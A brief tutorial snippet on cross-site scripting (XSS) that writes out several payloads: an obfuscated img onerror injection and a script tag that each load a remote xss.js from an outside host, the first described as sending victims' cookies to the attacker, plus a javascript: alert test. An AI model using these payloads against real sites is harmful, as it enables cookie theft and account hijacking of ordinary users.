Cross Site Scripting The short form is XSS ( not CSS because already CSS stands for Cascading Style Sheet) What the attacker will do by using XSS? He can inject his javascript,vbscript,flash,html into the user and can collect data from the user computer.The following code will send the victim's cookies back to the attacker's server)... <img src="" onerror="x=document.createElement('<sc'+'ript
src=http://www.mansiononmain.com/xss.js>');document.body.appendChild(x)">
|
Copy and paste this code in notepad and save it as test.htm. Then double click test1.htm. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> |